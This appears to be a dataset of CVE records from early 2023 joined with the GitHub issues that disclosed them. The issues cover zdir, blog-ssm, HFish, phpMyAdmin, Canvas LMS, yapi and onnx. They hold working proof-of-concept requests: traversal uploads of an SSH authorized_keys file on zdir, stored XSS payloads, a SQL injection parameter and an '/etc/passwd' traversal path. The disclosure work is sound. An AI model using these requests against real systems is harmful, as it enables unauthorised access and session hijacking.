## The steps to reproduce. zdir version: 3.2.0 ``` git clone https://github.com/helloxz/zdir go run main.go init ``` modify file: /zdir/data/config/config.ini ``` public_path=data/public ``` start ``` go run main.go start ``` View routes, the interface requires login credentials ![image-20230110170353211](https://user-images.githubusercontent.com/43353917/211514368-2e7e4013-3feb-4583-80e2-528afc9eed86.png) Enter the controller.Mkdir method, the parameters submitted by the post request are name and path ![image-20230110170618403](https://user-images.githubusercontent.com/43353917/211514712-c07c8575-c67d-4396-bf43-a937cc0390b6.png) Enter the !V_dir method and find that it is only to judge whether the passed path is a folder ![image-20230110170739292](https://user-images.githubusercontent.com/43353917/211514881-c0feba30-7f0c-4369-95cc-7b554fac2342.png) This creates a .ssh directory using directory traversal ``` POST /api/dir/create HTTP/1.1 Host: 127.0.0.1:6080 Content-Length: 28 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96" X-Token: 433a01baeaa6c37ef46f21621cc06f95 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: application/json, text/plain, */* X-Cid: bPlNFG sec-ch-ua-platform: "Linux" Origin: http://127.0.0.1:6080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:6080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95 Connection: close path=/../../../../&name=.ssh ``` ![image-20230110170950739](https://user-images.githubusercontent.com/43353917/211515051-55d7afcd-5032-44f4-b953-5fe41a8d5d4e.png) Enter the controller.Upload method, you can specify the upload path ![image-20230110171249876](https://user-images.githubusercontent.com/43353917/211515177-686a6ee2-d08d-44e3-b068-d30153a2a389.png) There is a loophole in the regex to determine whether the path is legal, and you can use `/../` to bypass it ![image-20230110171431322](https://user-images.githubusercontent.com/43353917/211515303-63204046-7cd1-43c0-aaee-73e26159d5f0.png) Determine whether the folder exists, and terminate execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file name without renaming it. ![image-20230110171517184](https://user-images.githubusercontent.com/43353917/211515594-de360e0c-8467-4041-a10b-7bc30a294d5d.png) ``` POST /api/upload HTTP/1.1 Host: 127.0.0.1:6080 Content-Length: 897 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96" Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA X-Token: 433a01baeaa6c37ef46f21621cc06f95 X-Cid: bPlNFG sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 sec-ch-ua-platform: "Linux" Accept: */* Origin: http://127.0.0.1:6080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:6080/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95 Connection: close ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA Content-Disposition: form-data; name="path" /../../../../../../home/kali/.ssh ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA Content-Disposition: form-data; name="file"; filename="authorized_keys" Content-Type: text/plain ssh-rsa ------WebKitFormBoundaryqjo68lEJ6LlJ8zdA-- ``` Generate an ssh public key for upload ![image-20230110171817094](https://user-images.githubusercontent.com/43353917/211515711-9f5be1be-7f14-49a0-9b59-a0e24deb88b7.png) Then you can use ssh to connect to the server ![image-20230110172024799](https://user-images.githubusercontent.com/43353917/211515794-0466fd2d-a861-49c9-9cc5-8db6a0ab7187.png)
File upload ssh authorized_keys causes RCE
https://api.github.com/repos/helloxz/zdir/issues/90/comments
3
2023-01-10T09:39:47Z
2023-01-11T03:06:06Z
https://github.com/helloxz/zdir/issues/90
1,527,065,234
90
4,651
CVE-2022-40034
2023-01-23T22:15:11.123
Cross-Site Scripting (XSS) vulnerability found in Rawchen blog-ssm v1.0 allows attackers to execute arbitrary code via the 'notifyInfo' parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rawchen/blog-ssm/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rawchen/blog-ssm/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:javaweb_blog_project:javaweb_blog:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "21D0CA03-C751-4E49-8639-19CE34B36471", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/rawchen/blog-ssm/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rawchen", "blog-ssm" ]
## Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment #### [Suggested description] blog-ssm v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /comment. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the notifyInfo parameter. #### [Vulnerability Type] Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') #### [Vendor of Product] https://github.com/rawchen/blog-ssm #### [Affected Product Code Base] 1.0 #### [Affected Component] blog-ssm 1.0 OS: Windows/Linux/macOS Browser: Chrome、Firefox、Safari #### [Attack Vector] ##### Step1:Registered account, username: text123, password: 123456. ![image-20220901151056903](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151056903.png) ##### Step2:Log in to the account you just registered and click "File Management". ![image-20220901151310085](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901151310085.png) ##### Step3:Click any article on the homepage and enter malicious Javascript code in the comment area. ![image-20220901153618078](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901153618078.png) ![image-20220901153902249](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901153902249.png) ###### Data Pack: ```bash POST /comment HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 72 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/articles/blog-ssm Cookie: JSESSIONID=F68B6E11EB57F40C26C413029E832793 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 contentId=65&commentText=%3Cscript%3Ealert%28%22123%22%29%3C%2Fscript%3E ``` ##### Step4:Visit the article again to trigger a stored XSS attack. ![image-20220901154108104](https://github.com/mbslzny/Drawing_Bed/raw/main/image/20220901/image-20220901154108104.png) #### [Attack Type] Remote #### [Impact Code execution] True #### [Reference(s)] https://cwe.mitre.org/data/definitions/79.html
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') In /comment
https://api.github.com/repos/rawchen/blog-ssm/issues/4/comments
0
2022-09-01T13:09:21Z
2022-09-01T13:09:21Z
https://github.com/rawchen/blog-ssm/issues/4
1,358,824,051
4
4,652
CVE-2020-22327
2023-01-26T21:15:21.297
An issue was discovered in HFish 0.5.1. When a payload is inserted where the name is entered, XSS code is triggered when the administrator views the information.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hacklcx/HFish/issues/61" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hacklcx/HFish/issues/61" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hfish_project:hfish:0.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "BE9A3172-C29E-43D7-B9AE-B3A41A6248A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/hacklcx/HFish/issues/61
[ "Exploit", "Third Party Advisory" ]
github.com
[ "hacklcx", "HFish" ]
![20200226213922](https://user-images.githubusercontent.com/45984360/75353262-15d19300-58e6-11ea-9b2f-94205a0b474e.jpg) Modify the client config.ini file in a distributed cluster where the client name constructs an XSS statement to attack the server > [rpc] status = 2 # 模式 0关闭 1服务端 2客户端 addr = x.x.x.x:7879 # RPC 服务端地址 or 客户端地址 name = **_< img src=x onerror=alert(1)>_** # 状态1 服务端 名称 状态2 客户端 名称
the client name can XSS
https://api.github.com/repos/hacklcx/HFish/issues/61/comments
1
2020-02-26T14:17:47Z
2020-04-10T09:13:25Z
https://github.com/hacklcx/HFish/issues/61
571,409,433
61
4,653
CVE-2020-22452
2023-01-26T21:15:21.650
SQL Injection vulnerability in function getTableCreationQuery in CreateAddField.php in phpMyAdmin 5.x before 5.2.0 via the tbl_storage_engine or tbl_collation parameters to tbl_create.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://phpmyadmin.com" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/phpmyadmin/phpmyadmin/blob/master/ChangeLog" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpmyadmin/phpmyadmin/issues/15898" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phpmyadmin/phpmyadmin/pull/16004" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://phpmyadmin.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/phpmyadmin/phpmyadmin/blob/master/ChangeLog" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/phpmyadmin/phpmyadmin/issues/15898" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phpmyadmin/phpmyadmin/pull/16004" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*", "matchCriteriaId": "4A1F1DCF-9344-4F54-9266-D8BE32E89223", "versionEndExcluding": "5.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/phpmyadmin/phpmyadmin/issues/15898
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "phpmyadmin", "phpmyadmin" ]
### Describe the bug - sql injection in /phpmyadmin/libraries/classesCreateAddField.php - function getTableCreationQuery() line 457 ![sqli_phpmyadmin](https://user-images.githubusercontent.com/22276712/73620854-38b1b400-4666-11ea-869f-e536cbee876b.png) ### To Reproduce Steps to reproduce the behavior: 1. Go to http://localhost/phpmyadmin/tbl_create.php?db=anydb 2. Click on save 3. sniff resquest and edit param `tbl_storage_engine` or `tbl_collation` 4. See error ### Expected behavior https://www.slideshare.net/OWASPEEE/russia-mysql-oob-injections ### Screenshots -adding `'` in param `tbl_storage_engine` ![error_phpmyadmin](https://user-images.githubusercontent.com/22276712/73620906-829a9a00-4666-11ea-97fb-e0650030aac9.png) - adding comment `-- -` ![not_error](https://user-images.githubusercontent.com/22276712/73620980-da390580-4666-11ea-9979-2c04ea7a34ab.png) ### Server configuration - Operating system:windows 10 - Web server:localhost TCP/ IP - Database version:10.4.8-MariaDB - PHP version:PHP Version 7.3.10 - phpMyAdmin version:5.0.1 ### Client configuration - Browser:firefox - Operating system:windows 10
sql injection in /phpmyadmin/libraries/classesCreateAddField.php
https://api.github.com/repos/phpmyadmin/phpmyadmin/issues/15898/comments
9
2020-02-03T02:24:17Z
2023-02-08T16:07:25Z
https://github.com/phpmyadmin/phpmyadmin/issues/15898
558,804,635
15,898
4,654
CVE-2021-36539
2023-01-26T21:15:23.730
Instructure Canvas LMS didn't properly deny access to locked/unpublished files when the unprivileged user access the DocViewer based file preview URL (canvadoc_session_url).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaukas/instructure-canvas-file-oracle" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/instructure/canvas-lms/issues/1905" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gaukas/instructure-canvas-file-oracle" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/instructure/canvas-lms/issues/1905" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:instructure:canvas_learning_management_service:*:*:*:*:*:*:*:*", "matchCriteriaId": "64B90B12-957C-4A19-BFFA-DC8983B4AA2D", "versionEndExcluding": "2022-10-15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "639" ]
639
https://github.com/instructure/canvas-lms/issues/1905
[ "Exploit", "Third Party Advisory" ]
github.com
[ "instructure", "canvas-lms" ]
<!-- We use GitHub issues for bug reports only. Please post feature requests on our [community site](https://community.canvaslms.com/t5/Idea-Conversations/idb-p/ideas). For support, see [getting help](https://github.com/instructure/canvas-lms/wiki#getting-help). Thanks! --> ### Disclaimer This is an active exploit and it might be actively utilized. I don't know if this is a proper place to file for it but I find no better place elsewhere after my email got no response in 1 month. I choose to publish it here during the summer break to minimizing the potential impact. I would suggest publishing a `Security Advisories` to raise awareness if see fit. ### Summary: `canvadoc_session_url` could be exploited for unrestricted access to unpublished content. ### Steps to reproduce: 1. Get API access to Canvas as a student to a specific course. 2. [Optional] Bruteforce finding file ID for a specific course ID. For example: `https://canvas.myschool.edu/api/v1/courses/$CourseID/files/$FileID` - This step could be optimized with knowledge of the approximate file ID range and/or the keyword in the filename. 3. Access `canvadoc_session_url` in the JSON object returned by the API. ### Expected behavior: The `canvadoc_session_url` should deny access for whoever logged in Canvas as a student if the file is not published. ### Actual behavior: Access to locked/unpublished files is granted to students via `canvadoc_session_url`. The student will be redirected to a DocViewer under `https://canvadocs.instructure.com/` ### Additional notes: This exploited might already be fixed in a new version. But please understand different institutions might not be using the same up-to-date version of Canvas as I clearly see different access verification levels from different institutions. If that is the case, please kindly notify users to update to a minimal version with a feasible fix. Otherwise, proper permission checking for `/api/v1/canvadoc_session` should be easy to implement and enforce. Credits go to @yl4579 for realizing this potential exploit in a tea-time discussion with me.
unrestricted access with canvadoc_session_url
https://api.github.com/repos/instructure/canvas-lms/issues/1905/comments
0
2021-06-29T21:51:00Z
2021-08-19T01:05:19Z
https://github.com/instructure/canvas-lms/issues/1905
933,131,755
1,905
4,655
CVE-2021-36686
2023-01-26T21:15:24.030
Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/YMFE/yapi/issues/2190" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/YMFE/yapi/issues/2240" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/YMFE/yapi/issues/2190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/YMFE/yapi/issues/2240" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ymfe:yapi:1.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "E63DF2FF-172A-49A4-98B4-F5EF98D8BB25", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/YMFE/yapi/issues/2190
[ "Exploit", "Third Party Advisory" ]
github.com
[ "YMFE", "yapi" ]
## 版本号 ~ 1.9.1 ## 什么问题 ~Stored XSS in remarks of the interface ## 如何复现此问题 ~ Demo: https://yapi.baidu.com 1. Create a group after login: ![image](https://user-images.githubusercontent.com/41558659/117524349-95311b00-afef-11eb-8908-3bf496de482d.png) 2. Then create a new project: ![image](https://user-images.githubusercontent.com/41558659/117524357-9a8e6580-afef-11eb-8401-6fd47ea9233f.png) 3. Enter the project, and add an interface: ![image](https://user-images.githubusercontent.com/41558659/117524381-a712be00-afef-11eb-9763-e5db380133d9.png) 4. After adding successfully, enter the interface edit page: ![image](https://user-images.githubusercontent.com/41558659/117524403-b265e980-afef-11eb-822d-f78a9bbdfbf2.png) 5. Scroll down to the remark module. Insert the payload: `<? =><video src=x onerror=alert(document.domain)>` ![image](https://user-images.githubusercontent.com/41558659/117524424-c27dc900-afef-11eb-902f-ea1833f68830.png) 6. After saving, return to the group. Click on the member list and add the username we want to attack. (There is no need for confirmation from the target user, as long as the user name is correct, the target user can be added to the project. Here we use another account to test.) ![image](https://user-images.githubusercontent.com/41558659/117524445-d0334e80-afef-11eb-998f-cd36a45ade71.png) 7. After the victim logged into the system, he found that he was added to a group: ![image](https://user-images.githubusercontent.com/41558659/117524459-dd503d80-afef-11eb-8e5e-d7eda72cd211.png) 8. He entered the group, viewed the project interface, entered the edit page, and triggered the XSS Payload inserted by the attacker. ![image](https://user-images.githubusercontent.com/41558659/117524461-ea6d2c80-afef-11eb-878c-bf3bbcfc9794.png) ## 什么浏览器 ~ Firefox Chrome ## 什么系统(Linux, Windows, macOS) macOS
Stored XSS in remarks of the interface
https://api.github.com/repos/YMFE/yapi/issues/2190/comments
0
2021-05-08T03:24:45Z
2021-05-08T03:24:45Z
https://github.com/YMFE/yapi/issues/2190
880,182,962
2,190
4,656
CVE-2021-36686
2023-01-26T21:15:24.030
Cross Site Scripting (XSS) vulnerability in yapi 1.9.1 allows attackers to execute arbitrary code via the /interface/api edit page.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/YMFE/yapi/issues/2190" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/YMFE/yapi/issues/2240" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/YMFE/yapi/issues/2190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/YMFE/yapi/issues/2240" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ymfe:yapi:1.9.1:*:*:*:*:*:*:*", "matchCriteriaId": "E63DF2FF-172A-49A4-98B4-F5EF98D8BB25", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/YMFE/yapi/issues/2240
null
github.com
[ "YMFE", "yapi" ]
## 版本号 ~ 1.9.1 ## 什么问题 ~ stored xss ## 如何复现此问题 1. Visit the interface edit page, click edit, remarks, select markdown, insert payload in write mode: `<svg onload=alert(document.domain)>` ![image](https://user-images.githubusercontent.com/38938010/125035761-c9df5280-e0c4-11eb-9cb4-1e852d2aabcf.png) 2. Click preview, successfully triggered, click OK to close the pop-up box, then click save, refresh the page, click edit, trigger storage xss ![image](https://user-images.githubusercontent.com/38938010/125035984-0f9c1b00-e0c5-11eb-8740-e3f082574ec0.png) ## 什么浏览器 ~ Firefox Chrome ## 什么系统(Linux, Windows, macOS) Windows
Stored XSS in remarks of the interface
https://api.github.com/repos/YMFE/yapi/issues/2240/comments
0
2021-07-09T07:01:46Z
2021-07-09T08:18:06Z
https://github.com/YMFE/yapi/issues/2240
940,479,947
2,240
4,657
CVE-2022-25882
2023-01-26T21:15:31.333
Versions of the package onnx before 1.13.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory, for example "../../../etc/passwd"
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856" }, { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/onnx/onnx/issues/3991" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/onnx/onnx/pull/4400" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/jnovikov/02a9aff9bf2188033e77bd91ff062856" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc%23L129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/onnx/onnx/commit/f369b0e859024095d721f1d1612da5a8fa38988d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/onnx/onnx/issues/3991" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/onnx/onnx/pull/4400" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://security.snyk.io/vuln/SNYK-PYTHON-ONNX-2395479" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxfoundation:onnx:*:*:*:*:*:*:*:*", "matchCriteriaId": "19431039-E312-4320-AA6C-D88EE31CE1B5", "versionEndExcluding": "1.13.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/onnx/onnx/issues/3991
[ "Exploit", "Third Party Advisory" ]
github.com
[ "onnx", "onnx" ]
The external_data field of the tensor proto can have a path to the file which is outside the model current directory or user provided directory, for example "../../../etc/passwd". There is no validation on this in this function: https://github.com/onnx/onnx/blob/96516aecd4c110b0ac57eba08ac236ebf7205728/onnx/checker.cc#L129 The python library have the _sanitize_path function which has some basic restrictions but it doesn't work when you use the default onnxruntime package to do the model execution. I can provide POC and create a patch by request.
The onnx runtime allow to load the external_data from the file outside the folder
https://api.github.com/repos/onnx/onnx/issues/3991/comments
4
2022-02-06T18:21:58Z
2022-08-10T15:35:51Z
https://github.com/onnx/onnx/issues/3991
1,125,277,391
3,991
4,658
CVE-2022-40035
2023-01-26T21:16:03.807
File Upload Vulnerability found in Rawchen Blog-ssm v1.0 allowing attackers to execute arbitrary commands and gain escalated privileges via the /uploadFileList component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rawchen/blog-ssm/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rawchen/blog-ssm/issues/3" } ]
